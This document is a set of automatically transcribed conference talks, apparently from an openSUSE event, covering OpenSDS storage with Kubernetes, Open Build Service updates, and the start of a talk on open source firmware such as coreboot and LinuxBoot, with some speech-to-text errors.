functions. About storage, OpenSDS can create volumes, attach volumes, snapshot, replication, and delete. About multi-clouds, use bucket, and migration. Each functions only do one thing. That is small power. But OpenSDS has autonomous data platform. That means each functions could create each other. I tell one scenario, system request volume. OpenSDS create volume and replicate. Every day, get snapshot. And after months, system does not need data. OpenSDS move data to call the tape, sorry, call storage like tape. Not tape.js has not implemented yet. About multi-clouds, OpenSDS implements migration. You can migrate data from AWS S3 to Azure Storage. About OpenSDS, developing is going on. Start is that, they run. So A, Ava, B, Bari, O, Bari is host of OpenSDS Azure Summit this year. And C, Capri is now developing. Capri feature being managed to master of OpenSDS GitHub. There are many notable features, especially data lifecycle. Data lifecycle manage object lifecycle. To define town, AWS S3 objects migrate to Azure Storage after that time. And finally, delete it. If data have lifecycle like log, you can map it to storage. This is the future of OpenSDS. Many companies joined OpenSDS as user and established user group name and user advisory committee. They do not advice user, they advice developer. They request their want and need. How's meeting by week? This project grow depend on user demand same as other OpenSDS projects. OK, changing the topic. I talk container volume strategy, first I talk about Docker. This picture is draw container recreate. You know container is virtualization system. Container contains all things. But that means container also has data. Container has one advantage that is you can recreate container from image anytime. Recreated container is same as before because it created from same image. Image don't has data. So container also don't has data. We resolve this to write data outside of container. One is mount host pass. Or two is use data volume container. Data volume container is container so it has same theme. Usually we plan back up to safety place. When we design container storage strategy about Docker and Kubernetes, most important thing is to determine which data need to be outside of container. In other words, which data need to be persistent. It is necessary to know container structure so that we know it. Which data does not change from image? Which data changes from image in operation? Which data changes from image is close of which data needs persistent? And if we can, we should express which data is changing in operation and we create container images. Okay, cubic and volume. About cubic, port runs independent north. So port cannot use north except different north affinity. Upper side of this slide is independent north. For lower side of this slide is dependent physical like north. So to join port to volume, volume should be network volume. This item in slide express Kubernetes resources except storage most lower item and admin which is human. To use this mechanism, port should have persistent volume claim name to use and mount point in port. Persistent volume claim define what want. For example, volume type, capacity and access mode. Type is storage class which is second from bottom resources. Persistent volume is express volume to use. This define type, capacity and access mode. Which is same as persistent volume claim. Further, storage data like API IP. Last is storage class. This is category of storage. Category is defined by admin's data arbitrarily, not storage demands. For example, high speed and low speed. To save policy, this definition is called profile. Some storage systems includes open SDS. Kubernetes has two way to provision volume. One is left side. This is handmade by admin's data. Admin's data like YAML for persistent volume. Kubernetes attach persistent volume to persistent volume claim automatically. Kubernetes finds, satisfying and demand persistent volume. Define of data, sorry, define of storage data like API IP in persistent volume is used by this case. Two is left side. This is dynamic provisioning. To create persistent volume claim, persistent volume is created by Kubernetes automatically. This model like software define storage. To use this, we need to define provisioner in storage class. Provisioner create persistent volume and attach automatically. Kubernetes has many provisioner of major storage like ZCE persistent disk, SINDA. Further, Kubernetes supports CSI, which is common storage interface. CSI can append other storage provisioner and can use same way in this dynamic provisioning. I say simply, CSI need to run node plug-in pod and controller plug-in pod, two pods. So to define provisioner in storage class, we can use this append provisioner. The one way, one of way that open as the support Kubernetes is CSI. This is release and recommender data. Now, this is the only way to open as the as used by Kubernetes, by cubic. OK. I tell feature features. This is the alpha features Kubernetes implements service catalog, which is implementation of mechanism to use open service broker. Open service broker is API of service broker. So what is service broker? Service broker is solution of cloud foundry to use other managed service. Service broker join cloud foundry to other managed service like RDS. Developer implements open service broker as cluster service broker. Service catalog in Kubernetes use cluster service broker. Cluster service broker mediate between Kubernetes and managed services. I tell workflow to use service catalog. First, first, add on the letter get list from cluster service broker. Cluster service broker shows list of service from managed service. This list represent in Kubernetes as cluster service class and cluster service plan. Cluster service class is type of service like volume. Cluster service plan is plan of service like free tier or paid tier. This time, there is no instance anywhere. Only get list. Second, use managed service for pod. This step has two Kubernetes resources. One is service instance. This is represent service. Two is service binding. This is represent bindings of pod and service instances. Add on the letter select cluster service class and cluster service plan for pod. And create service instance define the touch plans. This step creates managed service instance. So add on the letter creates service binding for pod. This step create secrets includes binding information. Secret is one of resources, one of Kubernetes resources. This define subject is different each managed services. Last, add on the letter creates pod define secrets service binding made. In this model, add on the letter create service instance and service binding. And add on the letter tell operator service binding information to need pod. Operator creates pod with reference to the information. I tell this in talk of cubic and open sds, but workflow is same as the managed service. So open sds developed service broker. Now this is alpha. Outline is same as other service brokers I explained. Managed service is open sds and cluster service broker developed open sds measured between cubic and open sds. Service class that cluster service broker show is volume service. Yes, open sds is solution of volume. Service plan that cluster service broker show is the path, replication and more. Administrator creates service instance with to set service class and service plan. And creates service binding with to set service instance. Service binding creates secret includes binding information which includes volume ID. Now I talk about one new feature of Kubernetes that named pod preset. This is also alpha. This is injection additional runtime requirements into a pod at creation time. Pod preset define injection data. And pod create pod injected that data. Levels select are measured between pod preset and pod. This case pod preset define volume and volume amounts. And define match levels. Operator only creates pod include level match the match levels in pod preset. Pod preset needs volume ID that define service binding. And use flex volume plug in to join volume. To use flex volume is a bad idea many people think. So this should be changed. This model administrator creates service instance, service binding and pod preset. And tell operator level name which is match pod preset. Operator only define level name that tells by administrator. Cluster service broker open sds developed will improve. So cubic can use open sds effectively through service binding. And finally I speak packaging status. Unfortunately all distribution do not remark open sds. But yesterday open sds member told me that third is ready. But this is only for open suzer not cubic not micro os. Other way we have to compare to use open sds in open suzer. In fact open sds is new solution unstable and too complex. But open sds has potential. I think there is a way to package it. I want somebody to package it. Or if nobody it maybe I will try to package it. Please help me if I do. There is one notable point. Open sds tutorial wiki has take us that we recommend use open to strongly. I tell them that I do that tutorial as open suzer. They rejoice that I want to modify that take us to open and open suzer strongly. I will express experience to use open sds. Please remark it and use open sds with cubic. Thank you. That's all my presentation. I have Q&A time but sorry I am not good at English. Please ask slowly. Any questions? Okay. I finish my talk. Thank you. Thank you.
I introduce OpenSDS that is an open source community working to address storage integration challenges. I remark technology. OpenSDS can manage LVM, Ceph, Cinder, and more as a software defined storage. and We can use OpenSDS in Kubernetes through CSI, Flexvolume, and Service Catalog. therefore, Kubernetes can use software defined storage by OpenSDS. I draw overview of Kubernetes - OpenSDS - storage relationship and explain one case of to build on Kubic. This strategy bring us these benefits: - If Administrator create PodPreset at SDS, Application developer don't need to prepare storage. - If Administrator create storage pool, He don't need to create volume each request. And I explain potential of replication with DRBD. Participant can learn SDS strategy on Kubernetes with OpenSDS. and How to build on Kubic.
10.5446/54413 (DOI)
Well, we can start. Hello, thank you for coming to this talk about OBS, Open Build Service. First of all, let me introduce you to the people who are going to talk to you today. My name is Sarai. I am a web developer in OBS. David is also a web developer. Frank works in the backend. And Marco is in charge of OAC, our command line client. Some of our colleagues really believe that we work like this. We live in the Canary Islands in Spain, and they think we are all day long lying on the beach. I'm bathing with our laptop, but it's not like this at all. We work in a normal office. We share it with all the Canary guys, and it is quite normal, as you see, full of chameleons, of course. And this is the agenda for today. We are going to talk about what is new in OBS. David and I are going to talk about the web application. Then Frank is going to explain us what's new in the backend. And finally, Marco is going to tell us the news about the command line client. Well, sometimes we develop some features that are so big or so complex that we need exhaustive testing for them. So we need some users to test them, but they are not in a final version. So how can we do that? We have for that the beta program, where we don't show those features to all the users, but only to those users who want to join the beta program and test what's new, all the features that are ongoing development. It's very easy to join. Any of you can join right now if you want. You can just have to log in in OBS, go to the profile page, to your user page, and then on the left side, you have a link to join the beta program. From that moment, you can see all the new features that we are delivering, and you can start working with them in your daily work. And it's going to be very useful for us because maybe you can find some bugs or you can realize that some workflow has changed and it's not good for you. So please join the beta program. It's very easy. And every time we deliver some new features, we are going to announce them in our blog. Have a look to it every two weeks or every month. Usually you will see something new there, and it's very important for us that you test them and open an issue if you find something strange. If you join the beta program right now, you can see that we have a refreshed user interface. You can see that most of the pages have looked a different way. And why do we re-bump the user interface? We have many reasons for that, and the most important one is that the technology we were using is now obsolete, and it is not longer maintained. So for this reason, we are re-bumping it. We have to choose a new technology, but there are more reasons. Another one is that we want our user interface to be mobile-friendly. We also thought that it was time to make it more modern and a bit nicer. It's also useful for us to rewrite the code a bit because it was a bit chaotic sometimes, and we need them to be tidy and clean to be able to refactor it in the future or maybe changing the workflow, and it's easier if we have everything tidy and clean. Well, we did some proof of concepts with some workflows, some frameworks, sorry. We tried semantic UI. We also tried Bootstrap and Bulma. And finally, we realized that the best for us was Bootstrap. The reasons are, first of all, there is a big community behind Bootstrap. It is a stable project. It's reliable. It's well-documented. It has all the features we needed. Some of our colleagues had experience with it, so we choose it. I'm going to show you some of the pages that has changed. This is the old main page, the home page of OBS. And now you can see how cool is it nowadays. A lot of change, right? Amazing. Don't you think so? I don't think so. Yes, it has changed a bit. We have new icons. The layout is wider. We have more empty space between the elements, but it's not really a big change, as you can see. That is what we wanted to achieve. We didn't want to disrupt your daily work. We just wanted to keep it like it was, but it has changed a lot behind. The code has changed a lot. We have migrated a lot of things. For us, we are getting what we wanted. This is another example. This is the page of the project. It looked like this before, and now it looks like this. Yes, a bit better. Not bad. Most of the pages are migrated like this, keeping what we had before, but making it more clean. And now I'm going to show you some of the pages that really changed, because we thought it was necessary or it was a bit confusing before. The repository page is one good example. It was like this. We had some list of all the repository names. A bit more information. But now we are displaying this in boxes. We are using all the free space on the right, so it looks better now. This is another good example. This is the pulse page. This is, it was a list also, and now it looks like this. It's colorful. All the information is divided into sections. We also can select for periods of times there, so it has improved a lot. Also, we did some good job, I think, with the group members tab before it was a table for only one column or two, if you are admin. And now we can see all the users like this. We focus on the avatar and the name, and they are side by side to use better the space. We did it. We have our application, and now it's mobile friendly. It looks very well in the mobile. You can see everything I have just shown you if you joined the beta program. So please join. Please give us feedback. Please let us know if you have found something wrong or you suggest any change. That's all from my side. David, I'm going to tell you more interesting things about OBS. Thank you. Thank you, Serai. I look like a singer with that. Okay. So now we have the Statute Report API. I mean, in the last few years, we were trying to do some changes. We were trying to improve our continuous integration. And we know that when we can provide more information, you can take better decisions for stuff that you can do in your workflow. So let's explain a little bit what is a continuous integration. So imagine like in GitHub, your source code is you have a pull request, so it's trying to build. We pass it to some testers, and after that, the tests are reported. So you have some report, and everything is green. Everything is fine. So it's merged to your source code, and you can release it. What we have done with the Statute Report API is an API that you can take this information from the external tool and show it in OBS. That means that when your, for example, Travis tells your testers green, in OBS you can show this information. You can see it in the checks that is below, that we have some test with OpenQA, that is a Xeed, another one with a Minimum that is pending because it's not finished, and one that is failed. And with this Statute Report API, we empowered our staging workflow. Our staging workflow is some kind of CI, because with that, we can take a bunch of summary requests and test all together. So for example, here, we can see that we can take a lot of packages, a lot of summary requests that you want to integrate in your project. You add it in a staging project that then they start to build, and it is in an external CI. With the Statute Report API, you can check if the external have done or finished it, and have finished it, sorry, I forgot this slide, if it has finished it and reported, and if it's green, you can merge it, and you can release it. So here we have an example, so here you can see the staging workflow. In this case, for the project test Linux. And I think it looks like it's very useful. So with that, you can see that the good point of the staging workflow is that you can take different summits requests that are really different from different projects, and you can test all of them together, not like the other CI that you can only test independently by Y1. So now let's speak a little bit about the future. So right now what we have is that when some changes occur in our repository, that is the case of GitHub, someone contributes, make a pull request, this pull request is merged, GitHub sent to us a request, and then we start to do stuff. For example, updating the source, start rebuilding. But what we cannot do and we want is when something happens in OBS, we should also be possible to send an event or send a request to another standard tool. For example, in the case of OpenQA, so we want an event to happen in OBS, we can tell to OpenQA, okay, now you can test. OpenQA is an automatic tool for OpenSystem. That could be OpenQA, that could be also Travis, any other kind of tool that we want to do. So with this concept, we try to improve the communication with the tools directly. We don't need to any intermediate or any kind of bots or any kind of ground that do stuff in the middle. So we want to connect and talk with the external tools directly. What another improve that we want to do is automate interface updates in real time. What that means? That means that you don't need to do any more F5, F5 to get information. So let's have an example. So here you can see that your user is interactive within the face and he talked with the backend, and the backend gave him the answer. So if you want to get an update information, you need to refresh again the page or do another action to get the feedback. And in a real example, here you can see the result, that is the back edge per city that is still building from some repository. And if the user wants to know that the build has finished, you need to click on the refresh icon that is on the top. And sometimes nothing changes because the backend is still building. You don't have any information. So what we plan to do really is when the backend has something to update, the interface should show the update information. That means that this build is taken in the bottom, should automatically change to succeed if the build was succeed without any interaction from the user. So now without any interaction. Besides rebuilding, as we are responsible for the instance, build opensusr.org. And we are many, we are many, many admin tasks like deployment, debugging, issues looking into the logs, monitoring to different dashboards. And we want to avoid this kind of task and doing things more automated. And automated, sorry, and connect system via software. And then we do the deployment as we are many people doing that and we expect in the future that more people will do the same. We need to have some kind of, we need to start managing the deployment. So we would like to know the current deployment. We would also like to set the deployment in a specific time or even know what's happening in the past, I mean the history of the deployment. Another aspect is we also try or maybe think going to the direction to the continuous deployment. That means when a change happens, deploy with automatically get a deploy. And that will provide to us more time to be able to focus in more important tasks. For having a clear vision of what's happening in the build. I mean the distance that we are in charge right now. We have to increase the monitoring for the application health, for application health. I mean, for example, for example, to look performances or to see what's happening there or what's happening with our system. And we also want to be alerted, I mean to get some notification when something critical happens to be able to fix it as fast as possible and give you a better service. So for example, right now, we have performance monitoring for that. We also have tracking, a track reception. But they are all disconnected. I mean, they sent to us the same, their own notification. And for us, it's a little, sometimes very hard to have an overview of the state of what is happening in all the place. Maybe the system is down, maybe the user makes something wrong. Something happened for us is very difficult to track all this information. So what we want to do is to work, what we want to work is to connect all these tools. Because like a C4, when something wrong happens, like for example, the service down, we want to know what's happened and we want to do it, to know it the easiest way to check what is happening. Sorry. And also to be sure that we, and having this information, we will be, we can fix the problem as fast as possible and give you a better service and bring back the service to its normal state. So in summary, what we want is to have an automated, connected and observable system. And that's all for my part, from my side. So Frank. Thanks, David. From the backend side, it was really hard for me to find something that might be interesting for the users because we did many improvements for the speed of the backend. But mostly, most users don't see the things we are doing there. So I will concentrate here on the constrainers stuff. We did it in the last year. We replaced Scopeo as a tool for our container uploads to a registry. We implemented container unpacking and layer layering on the server side and implemented the whole registry protocol. So OBS now can run as a Docker registry natively and a notary. So this is especially interesting when you run your own instance because it saves a lot of disk space. By this, I don't know who has already used registry openSusieWalk. We now enhanced the information which registry gives in the web front end, especially here. You can see that you have a link to your building project where the container is built. And now you also can choose your tool of choice for using the Docker containers. And that's from my side. And now I hand over to Marco. Hello, my name is Marco. Most of you might know me from sitting behind those video tables. But beside of that, I'm the OSC maintainer and OSC developer. And I make it really short because there is no big news. We are on the current version is 165.1. There was six releases since last year. Since I gave the almost same talk in Prague. We have 146 commits since then, which most of them are just small stuff, but nevertheless, 146 commits. And there were two big changes. One is the URL grabber is no longer needed. So we are not dependent on him anymore. And the reason why we are not dependent on him anymore is we are pie cents three compatible since the latest version. Yay. It took a long time, but at least we made it. So I have a lot of free time. No, not really. Because the next things we will completely rewrite the password handling because it's a pain in the ass. It's not good because if you ever have tried using key ring, I don't know, have anyone is using key ring with. Yeah. Yeah, it's possible, but it's not user friendly. Let's say that way. So this will be better than the complete setup process. So the first time you start always he will be improved so that you get like you have the choice should, should the password be stored at all? Should it be stored in the key ring? Something like that. Then the documentation as always needs to be improved. If anyone is interested in writing documentation, please come to cool. I will come to you. And what I realized while migrating to Python 3 is that the test coverage in Python and in OEC is not very good. We test the base library with where we mock the back end calls, which is what, which was nice because I used this pie two, two, three script, run it over OEC, let the test read run, everything works. I was very cool. I'm done. Five minutes. What's your problem? But then I started using it and everything broke. So we need better test coverage. We need better way to test like a complete CLI test, not only mocking the back end, but more like testing again against a real back end. And of course, there will be a lot of Python 3 bug fixes coming. So you will see a lot of releases like one, six, five, dot one, dot two, dot three, dot four, you name it, until the Python 3 branch is completely stable. So if any one of you is, please use the Python 3 branch, I am open to bug reports. I'm happy to receive bugs because the more bugs I get, the more I can fix and the more stable the Python 3 branch gets. So that was from my side. So questions, I think this is not just for me, this is for everyone. So if, yeah, if someone who is responsible for this talk. I'll save you. Okay. Any questions? No. Thank you very much. So before we leave, please. I forgot one slide in this talk. Wait, wait, wait, wait. And try to, okay. Don't forget, please, join the beta program, try buildup.org and create users. And also, review our blog for the formal news. Thank you very much. Thank you.
OBS Team will briefly explain the evolution of the OBS in the last year, and also some of the impressive features that have been included recently. We will introduce the advances of OBS, not only the Frontend but also those related with the Backend and OSC (command line tool). We will also give some hints about the upcoming features we have in mind for the future of OBS. Sounds interesting, right? Don't miss this talk and take advantage of knowing all the improvements that can make your work easier using OBS.
10.5446/54414 (DOI)
Hello everyone. I'm Daniel. Today we'll be speaking about open source firmware. First a small introduction starting with me because not everybody necessarily knows me and I'm strolling around everywhere. So yeah, this is me. I'm Daniel. I'm actually a web developer. So people might ask themselves why am I here at OpenSUSE conference because we're talking about operating systems. We're talking about software at large. Our platform is a distribution mostly. So and I'm not even going to talk about web stuff anyway. I also have a security background in fact. Okay, so I look at all the things out there. I don't just look at the very high level where I'm necessarily working, but also look at very, very low level sometimes. And that's what brought me here. I'm also a member of a hacker space in Bochum, Das Laboie, that I down there. That's our logo and other tutorials. But first I want to thank you. And by you I mean especially OpenSUSE, the project and the community. You all know this friend here on the left. If you don't know the one on the right, this is Oscar. And Oscar is the mascot of the OpenSUSE firmware conference. Last year we had the very first ever OpenSUSE firmware conference not far away from here actually in Erlangen. And among some large sponsors, we had like ARM and Intel was there. We also had OpenSUSE. And that was a very, very nice surprise for me. I didn't really expect this. So yeah, thanks again. We had 200 participants from all over the world from many different ages, from different vendors, companies. We had students. We had hobbyists. Literally everyone. And also people from different backgrounds. Okay, so not just people working directly on firmware, but we also have people who are even closer to hardware, people who are more in the field of security. And that's why we had two full days of talks and two tracks even. One of them covering the entire security topic. And if you've been following the news a bit, you might see that suddenly we need to look a bit more at security also in the fields of firmware, but more on that later. In addition, we also had two days full of workshops. So we also had a lot of sharing going on. Okay, and that's what we want to spike now. Because, I mean, we all know about OpenSource, but we feel like there should also be more in the field of firmware development. So speaking about which, what is firmware anyway? Okay, so firmware is literally everywhere. The picture here on the left, I took that from one of the printers in our office once, because it was just updating its firmware. It happens sometimes. So you need to tell people, oh, you can't print right now. It's running a firmware update. And now people suddenly get aware of, well, things actually running on those devices. Almost everyone has watched now like this, or not necessarily everyone, but many people, which is also running some sort of firmware. So those are those very small devices where you usually have one system on chip. And, well, they are kind of ubiquitous now. On the other hand, we all know laptops, like this one here. This here is an actual photograph of another laptop of mine. And here we actually see those settings we can do in the firmware. And in laptops, we typically have more than just one chip. We have lots of chips, and they all need some sort of firmware. So you all know BIOS, the legacy basic input output system. You heard about UEFI. So that's what many modern platforms are now running. That's what's on the host CPU. But you also have the ME, the Intel Management Engine, which is a tiny co-processor, also somewhere on your main board, found among Intel devices mostly, of course. Then you have a gigabit ethernet interface. It also requires additional firmware in many cases. So that means without that firmware, things may not even function properly. There is a better controller somewhere on your laptop, which is nowadays responsible, for example, to power the fan. So it will measure and check the temperature. If it's running too hot, then it will turn on the fan, make it go faster. And if that doesn't work, then, well, your laptop won't survive too long. Which brings us to vendors. So vendors are already providing us with firmware, right? So when we buy a laptop, we know there is already something on there. Even if there is no operating system installed, we still have firmware. So we can boot one of our systems, install it, and happily run our system, right? And we can even upgrade it. So now we have a new project. It's quite some years old now, but still getting more and more traction. The Linux Vendors firmware service, where vendors can go and upload their firmware. So that people running all those diverse distros, we have so many of them, people can still, regardless of the distro, use one single tool to upgrade the firmware. There is more than 100 vendors now on the list on that platform. Not all of them are already supplying updates there, but the platform is growing, and it's more and more vendors doing something. So we're actually done, right? So we don't really need to do much more in the fields of firmware. Let's check, because there is actually some issues now. Okay, so the first thing is continuous updates. I don't know about you, but usually when I, as an end user, I buy one laptop and I check the vendor site for updates. Usually I can count to like two or maybe three updates through the entire lifetime of the device, which is not very much. We already had a very similar issue with phones. You remember those devices which have been running an ancient version of Android for, I don't know how many years, which is not just a problem for consumers in the end, but also for the entire ecosystem. In my company, we have also developers on mobile platforms. There is iOS developers, which are always happy because Apple is always shipping updates, and there is Android developers who still always have to check, but we still have to support this and this version, how many people are still using it. And we don't want to keep the problem everywhere. So since we currently depend on the vendors, we need to do something ourselves, maybe. And we don't just rely on the vendors themselves, but we also rely on the quality. I just had a chat outside with someone telling me that they bought a device, an NVME drive, and it had a firmware issue for about nine months until they got an update. So imagine you buy a device and you can't use it for an entire year because your vendor doesn't provide you a firmware that actually works for it. And since we have so many components now, there is so much more we need to check for everything to work together. You can see one link here. I will publish these slides later so you can follow all those links. I promise you there is many more things to look into, so you can follow them later. Okay, let's look a bit closer at vendors. Supply chains. You are this person down there on the right. That's the end customer who is now buying some device. We have this big cloud above us which is promising us, hey, you can use a lot of free and Libre and open source software. You can just download it. You can share it. You can look at it. You can edit it. You can redistribute it. You can do many things with it. But that's only on the operating system currently and applications. You still need to buy some hardware from a retailer. You might be a bit unlucky. Sometimes you buy something and you will just see that thing doesn't really work for me. You don't expect something like when the first problems arose when devices had UFI checking for certain proprietary operating systems to be present, you wanted to install another operating system and suddenly people were writing, oh, no, nothing works anymore. We have lost our freedom. But that's only where you enter the supply chain. So if you look at this picture, I marked everything in colors which is a potential issue. Okay, so behind your retailer from which you buy the hardware, there is an OEM even behind or maybe other OEMs. There can be a whole chain of OEMs, the original equipment manufacturers, which again talk to other suppliers. There's the so-called ODMs, the device manufacturers or design manufacturers. There's the IBVs, the independent BIOS vendors. Independence means that the chain is getting longer and longer. And eventually we have the SOC vendors which are actually creating the chips. And now we have to assemble everything together and hope it works out. Which brings us to politics. So we as consumers, of course, the only thing we can do is we can choose the devices we want to buy. That's literally the only option we currently have. When I look at hackerspaces, usually there's like, let's say 50 or 60% of people are running some old and overthink pads. For some reason, it just developed like this. So they are very well known for a lot of support. So by support, I mean you can run lots of free software on it, even on some lower layers. And that includes even some firmware and more on that later. Now the problem is there's still lots of LOPS in there. So LOPS or binary large objects, that's what we cannot audit. That's the proprietary stuff we get where we lack visibility. If we even want to gain more freedom here, we need to have documentation. And we don't get that documentation everywhere. So only very, very few vendors actually publish their stuff. Which means sometimes you have to have a lot of understanding to actually even get started. We don't even have board schematics in many cases. So what we need to do is we need to disassemble our devices. We need to look at the board itself to get an understanding of how things work or try to come up with conclusions from what we already know from before. But again, it's still lack of knowledge we start with. And then again, there is so many chips which are requiring firmware. And I just mentioned some very briefly. But it's also other components like video, for example. You cannot even have video output without LOPS on some platforms. And that's a bad thing for us as an open source community. We don't really want that. We would like to have the sources. We would like to also work on things, improve them. Now what current vendors do is they implement an interface called UEFI. It's promising to be extensible. It's a firmware interface. That's literally what it means. And it's already huge. Now imagine a huge specification and you even want to extend that. That's so complex. This is not where we want to start. And then of course, there is security. I guess everyone has seen those pictures at some point. Spectre and Meltdown, they were in the news. They were big. There were those raw hammer attacks. And this is mostly still in research now. So it's even hard to tell if people actually exploited those vulnerabilities. So once again, that's another reason why we need more open source firmware. And also Bart's schematics and everything else. The Intel management engines had a longer list of CVEs with one, then the second one, and three, and four, and five coming up. People were getting a bit nervous about it. Suddenly calming down again, but still in the first place, it sounded like, oh no, everything is broken now. Well, I can calm you down again as well. It's not as bad at its sounds for end consumers at least. Some server boards were having trouble with this, of course. Because this is where the management engine was actually active. It can be used for provisioning. And that should, of course, work. So x86. Everything which has a minus is a very, very low layer. This is where we have a platform, which we are running on again. And the very first thing here is the ME, the management engine. We rely on something which no one on the outside world has actually seen ever. We could only do some black box tests so we can look from the outside and at some point say, oh, well, there's some service running here and there and we can try fuzzing it. And that's how they found the issues with it. And then we build firmware on top of that. There is now the system management mode. Based on that, we can run hypervisors. And then finally, and this is where we are more familiar with everything. We have our kernel. It can be a Linux kernel. It can be a BSD kernel, of course. Something which is open source, which we know works and we know how it works because we have a lot of knowledge about it. We have sharing of documentation. So that's exactly the opposite of what proprietary vendors are doing. And this is what we want and we want to keep it that way. And of course, that's also true for the applications we run on top. So I guess everyone here knows lots of open source applications. They know how to use them and maybe even saw some of the source code or even delivered patches at some point. By the way, I made this presentation here with Pandoc, although it's the same design as everyone else is using. I made it work also with Pandoc. So they got some patches now. So that's one upside of this talk here. But that's also what we want, right? So being able to contribute, knowing what's going on, auditing things, giving back. And that's why finally we want open source firmware. There is one project called Uboot. You might have heard about it because it's quite famous now. They support multiple different architectures, more than a thousand boards. And you find them on lots of small devices. That includes lots of routers you can get for home use. And also stuff like this. This thing here is so tiny. It's literally just a gigabit ethernet port and a small MIPS CPU behind it. And it's probably booting with Uboot. I'm still investigating this, but this is kind of the devices we're talking about when we talk about Uboot. It's also been used on other platforms, of course. And what does Uboot do? It initializes your hardware. So eventually, including this device and also your home routers, we probably run a Linux kernel on top. In this case here, it's a build of openwrt, the famous open source router project, which is also used for the German Freifunk project, or not just German, I guess now it's also spread among other countries. And it's so amazing. We can literally build an entire machine now because we have the overview of all the code running on it, except for maybe some blobs still missing there. Okay. Uboot can run a Linux kernel directly, but it can also run other stuff. For example, it could run a UUFI payload or a legacy BIOS payload. Okay. And another project here is Coreboot. It's very similar in the regard that it actually supports also lots of different devices and platforms. So it supports x86, supports also some ARM devices and others. It can also boot a Linux kernel directly. And since we are here using a Linux based software distribution, I guess you can see where this is going. It's used by Google for the Chromebooks, which are also based on the Linux kernel. It's being applied to more and more servers now. It's also getting popular among some hackers. So I mentioned I'm in a hacker space, and in fact, in Bochum, we kind of have like 10 people now toying around with this. So now I just told you we can run a Linux kernel straight from the firmware. What does that mean? You're used to seeing a bootloader, right? So usually when you turn on your laptop, you see something like grub or lilo back in the days. There's some others. And what are they doing there? Reimplementing a lot of stuff, which we already have in the Linux kernel, like drivers for hard disks, USB, and so on, networking for Pixie boot, maybe. You can even decrypt your hot drives. But why? And that's why we now have the Linux boot project. It started last year in January. That's when it was announced. And the idea of Linux boot is to use a very small Linux kernel, very similar to the OpenWRT project. Just use its drivers for devices for file systems, for maybe networking, for Pixie boot again, and then rely on the fact that Linux has been used and developed by so many people that we can be very certain that it works properly. And now the question is, we can suddenly implement bootloaders, which really don't have to do much more now. We really just need to boot an operating system. Imagine you already have drivers, so you can look at file systems, can read files, and now you can KXX into your next Linux kernel. It's amazing. So this is a project which is now continuing and growing. It's written in GoLang, or some utilities are actually written in GoLang. So if you are familiar with that language, it's something you could look into. But since we are running a Linux kernel now, you can write in any of the languages you are familiar with, which you can run on an operating system. So you can write something in Rust, you can write something in C if you will, anything. Now you can help yourself in case you can boot. And if you are eager now to try this out, I want to tell you a bit about the equipment you need first. So we need to take things apart, right? We need screwdrivers. You can get those everywhere. You probably already have them at home. Maybe you already exchanged some RAM or added some more, or added a hard drive or something. So this is what you already know. And in some cases you literally have to open the entire laptop to actually get to where you need to work, right? I promise you a very good investment is a magnifying lens. That's because for some reason those chips were made in such a way that they print dark gray on almost black. So it's very hard to read. And if you have a Mac and you have some extra light and you turn it a bit, then sometimes it really helps a lot to find the right chips in the right place. So this is how you can identify your chips. You see those chips here, this one. This is actually a very small flash chip from which the firmware image is read. So on this board here we have two of them. On one of them we have this test clip. This saves you the pain of actually doing soldering work. So you can just attach the clip. You just need to figure out the orientation and that's all. And suddenly you can interact with this chip. It's very much like a USB drive, just a bit smaller. So usually those range from 4 to 8 to 16 megabytes these days. This is the 8 pin form factor. There is also 16 pin form factors, but this is what you mostly find on current mainboards, like this one for example. On the other side you need a programmer. You can use anything which knows SPI. This one here is a very, very cheap device. You can get it for 5 or 6 or 7 euros on Amazon or eBay or whichever is your preferred platform. You can also use a Beaglebone Black or Raspberry Pi. People are famously doing this a lot. So if you look at tutorials, for example for Core Boot, people sometimes use those. I prefer this tiny device for one reason. I don't need to find the SPI interface and I don't get the wires wrong so easily. So I only need to get the orientation right and that's literally it. And again it's quite cheap. And of course we need the software side. So we have open source firmware now and we need to build it. If you know how to build a Linux kernel, then you also know how to build Core Boot or U Boot. The process is always the same. You need a tool chain. You need a tool chain on your host, but you also need a tool chain for an actual target. So for example Core Boot lets you just build a tool chain with a very small make command and then you can just choose it for your desired target platform. Of course it takes a while but you know then you have a tool chain. Sometimes you need some extra utilities. For example one that is called Yesil or IASL which is used for some other code to be converted and then some utility to use the programmer. There is the Flash Run project which is also adopted now by the Core Boot community which knows how to use lots of SPI programmers including the one I showed. But it also supports others like Raspberry Pi, BeagleBone Black. You can use many different ones. Now we have everything. Let's start hacking. So this is the first very simple thing which you can do even without the hardware equipment. Everybody can literally do this. You can clone a project. Let's say the Core Boot project. You can build its tool chain. By default it's configured to be running with CBIOS, a legacy BIOS implementation which is open source and they can just run it in QEMU just to try it out and see if it boots. So here's just a screenshot from CBIOS which is coming right after Core Boot. So Core Boot takes it as a payload and then just runs it and it gives us some output. Right? It says, hey, I'm CBIOS running here. It's running on the screen. Now we have output here and it can try to boot something. You can even attach an ISO file and then you can boot your favorite operating system. But of course this is more fun. Okay, so I want every one of you to look at the devices you find around you. Disassemble them. Look into them. We need that information which is still proprietary now. We can get lots of clues by just opening up devices. We can read out from work. We can analyze it. We can look at the board schematics from, well, the actual hardware standpoint if we don't have them in datasheets. We can try to figure things out. And that's what I did. This year is the result of, let's say, some years of work. I had this laptop for quite a while. It's from XMG which are related to Tuxedo. They are also present here. And I was having a slight problem with the touchpad here. So this thing here is a gigabyte laptop, so it's not clevo branded as most of the other devices they sell. And gigabyte doesn't publish much information. I tried to apply one of their firmware updates. I got it to boot. After having all of this knowledge, I literally used the programmer to flesh that new firmware. But I wasn't still very happy with it. So a friend of mine said, hey, let's see. Maybe you can get along with Coreboot. And I promise you it was very, very refreshing, painful, and at the same time, happy tour through all the layers of hardware and firmware. I gained so much knowledge just during the last, let's say, three months while doing this. All my progress is behind those links here. So I put everything on GitHub. There is one gist where I dropped lines on all the steps I went through. Some patches are already in the Coreboot documentation now. And there will be more and more added. And at some point, you will see that it's actually so similar to the Linux kernel. In lots of ways, we can learn from each other. And in fact, for this very device here, I looked at the Linux kernel source code to find relationships between certain chips I have in this laptop. For some reason, I was lucky to figure out about one chip that it's actually the same model as a different one when a company name changed. But how do you figure this out? Even if you know names of certain chips, you use a search engine to get information. It's really not trivial. But we can share information. And I'm very happy that the Linux kernel is open source. I could get that. So what did I get to work? You can see text on the screen here. It's not in a high resolution. So that's still something coming up. But, you know, I already got this output. Of course, before that even, RAM works. If you know operating systems, you already know that RAM is there. But this is what the firmware needs to initialize first. That's the first step you need to go through until you can actually do something more meaningful. They can initialize all the 